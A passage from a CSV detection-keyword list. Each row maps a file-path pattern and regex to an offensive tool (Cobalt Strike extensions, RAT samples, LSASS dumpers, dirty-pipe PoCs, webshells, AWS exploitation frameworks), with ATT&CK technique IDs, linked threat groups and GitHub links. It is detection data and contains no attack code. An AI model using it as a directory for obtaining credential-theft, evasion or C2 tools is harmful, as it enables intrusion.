Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","5059" "*//shuck.sh*",".{0,1000}\/\/shuck\.sh.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","N/A","10","1","69","9","2024-10-18T10:45:49Z","2023-01-27T07:52:47Z","5060" "*//StaticSyscallsDump/*",".{0,1000}\/\/StaticSyscallsDump\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - 
Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","5061" "*/_distutils_hack.zip*",".{0,1000}\/_distutils_hack\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","5062" "*/_sish/api/clients*",".{0,1000}\/_sish\/api\/clients.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","5063" "*/_sish/console*",".{0,1000}\/_sish\/console.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","5064" "*/0d1n.c*",".{0,1000}\/0d1n\.c.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5066" "*/0d1n_view*",".{0,1000}\/0d1n_view.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","5067" "*/0nly1 RAT*/Client.exe*",".{0,1000}\/0nly1\sRAT\s.{0,1000}\/Client\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5068" "*/0nly1 RAT*/Server.exe *",".{0,1000}\/0nly1\sRAT\s.{0,1000}\/Server\.exe\s.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5069" "*/0tt7/CVE-2022-23131*",".{0,1000}\/0tt7\/CVE\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - 
T1190","TA0004","N/A","N/A","Exploitation tool","https://github.com/0tt7/CVE-2022-23131","1","1","N/A","N/A","N/A","1","N/A","N/A","N/A","N/A","5070" "*/0xdarkvortex-*",".{0,1000}\/0xdarkvortex\-.{0,1000}","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","N/A","10","10","193","66","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z","5071" "*/0xIronGoat/dirty-pipe*",".{0,1000}\/0xIronGoat\/dirty\-pipe.{0,1000}","offensive_tool_keyword","dirty-pipe","POC exploitation for dirty pipe vulnerability","T1068 - T1055 - T1003 - T1015","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/0xIronGoat/dirty-pipe","1","1","N/A","N/A","N/A","1","10","9","2022-03-08T15:47:53Z","2022-03-08T15:30:45Z","5072" "*/0xthirteen/*",".{0,1000}\/0xthirteen\/.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","1","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","5073" "*/0xthirteen/StayKit*",".{0,1000}\/0xthirteen\/StayKit.{0,1000}","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. 
The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","N/A","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","5074" "*/1$a$$.exe*",".{0,1000}\/1\$a\$\$\.exe.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","1","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","5075" "*/1.6-C2.git*",".{0,1000}\/1\.6\-C2\.git.{0,1000}","offensive_tool_keyword","1.6-C2","Using the Counter Strike 1.6 RCON protocol as a C2 Channel","T1071 - T1095 - T1572","TA0011 - TA0010","N/A","N/A","C2","https://github.com/eversinc33/1.6-C2","1","1","N/A","N/A","6","10","78","5","2025-02-19T15:34:37Z","2024-01-23T18:30:00Z","5076" "*/1/all_in_one.7z.torrent*",".{0,1000}\/1\/all_in_one\.7z\.torrent.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","5077" "*/1/all_in_one_p.7z*",".{0,1000}\/1\/all_in_one_p\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","5078" "*/1/all_in_one_w.7z*",".{0,1000}\/1\/all_in_one_w\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - 
T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","5079" "*/10m_usernames.txt*",".{0,1000}\/10m_usernames\.txt.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","5080" "*/11_Credentials.py*",".{0,1000}\/11_Credentials\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","5081" "*/13_NoseyParker.py*",".{0,1000}\/13_NoseyParker\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","5082" "*/17_Custom_Cracklist.py*",".{0,1000}\/17_Custom_Cracklist\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","5083" "*/1mxml/CVE-2022-23131*",".{0,1000}\/1mxml\/CVE\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with 
configured SAML)","T1190 - T1550 - T1078","TA0001 - TA0003","N/A","N/A","Exploitation tool","https://github.com/1mxml/CVE-2022-23131","1","1","N/A","N/A","N/A","1","3","0","2022-02-19T03:14:47Z","2022-02-18T14:48:53Z","5084" "*/1n73ction.php*",".{0,1000}\/1n73ction\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5085" "*/365-Stealer.git*",".{0,1000}\/365\-Stealer\.git.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","5086" "*/3DESEncryptor.go*",".{0,1000}\/3DESEncryptor\.go.{0,1000}","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. 
The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tool","https://github.com/TunnelGRE/Augustus","1","1","N/A","N/A","6","2","131","26","2024-07-27T14:47:45Z","2023-08-21T15:08:40Z","5087" "*/3snake.git*",".{0,1000}\/3snake\.git.{0,1000}","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","N/A","7","8","752","109","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z","5094" "*/4luc4rdr5290/CVE-2022-0847*",".{0,1000}\/4luc4rdr5290\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/4luc4rdr5290/CVE-2022-0847","1","1","N/A","N/A","N/A","1","4","2","2022-03-08T20:41:15Z","2022-03-08T20:18:28Z","5095" "*/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1*",".{0,1000}\/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 
- TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","5096" "*/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1*",".{0,1000}\/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","5097" "*/888 RAT Private .exe*",".{0,1000}\/888\sRAT\sPrivate\s\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5098" "*/9_DPAPI.py*",".{0,1000}\/9_DPAPI\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","5099" "*/A7m3d Rat V.*.exe*",".{0,1000}\/A7m3d\sRat\sV\..{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5101" "*/AbandonedCOMKeys/*",".{0,1000}\/AbandonedCOMKeys\/.{0,1000}","offensive_tool_keyword","AbandonedCOMKeys","Enumerates abandoned COM keys (specifically InprocServer32). Useful for persistence","T1547.011 - T1049 - T1087.002","TA0005 - TA0007 - TA0003","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","5103" "*/ABPTTS.git*",".{0,1000}\/ABPTTS\.git.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","1","N/A","N/A","9","8","735","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z","5104" "*/acarsd-info.nse*",".{0,1000}\/acarsd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5105" "*/Accomplice.git*",".{0,1000}\/Accomplice\.git.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","5106" "*/Ace RAT v*/Server.exe*",".{0,1000}\/Ace\sRAT\sv.{0,1000}\/Server\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5107" "*/ACE_Get-KerberosTicketCache.ps1*",".{0,1000}\/ACE_Get\-KerberosTicketCache\.ps1.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","5108" "*/AceLdr.cna*",".{0,1000}\/AceLdr\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","N/A","10","10","925","164","2024-06-04T16:45:42Z","2022-08-11T00:06:09Z","5109" "*/AceRAT-Client.exe*",".{0,1000}\/AceRAT\-Client\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5110" "*/ACEshark.git*",".{0,1000}\/ACEshark\.git.{0,1000}","offensive_tool_keyword","ACEshark","uncover potential privilege escalation 
vectors by analyzing windows service configurations and Access Control Entries","T1058 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/t3l3machus/ACEshark","1","1","N/A","N/A","6","2","109","19","2025-01-15T07:01:48Z","2024-12-28T10:42:29Z","5111" "*/ACEshark.py*",".{0,1000}\/ACEshark\.py.{0,1000}","offensive_tool_keyword","ACEshark","uncover potential privilege escalation vectors by analyzing windows service configurations and Access Control Entries","T1058 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/t3l3machus/ACEshark","1","1","N/A","N/A","6","2","109","19","2025-01-15T07:01:48Z","2024-12-28T10:42:29Z","5112" "*/acheron.git*",".{0,1000}\/acheron\.git.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","N/A","4","326","39","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z","5113" "*/acheron.go*",".{0,1000}\/acheron\.go.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","N/A","4","326","39","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z","5114" "*/ACLight.git*",".{0,1000}\/ACLight\.git.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","5115" "*/ACLight/*",".{0,1000}\/ACLight\/.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - 
TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","N/A","N/A","N/A","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","5116" "*/acltoolkit*",".{0,1000}\/acltoolkit.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","N/A","2","120","12","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z","5117" "*/acm_enum_cas_*.json*",".{0,1000}\/acm_enum_cas_.{0,1000}\.json.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","5118" "*/acm_enum_certs_*.json*",".{0,1000}\/acm_enum_certs_.{0,1000}\.json.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","5119" "*/acm_enum_certs_chain_*.json*",".{0,1000}\/acm_enum_certs_chain_.{0,1000}\.json.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","5120" 
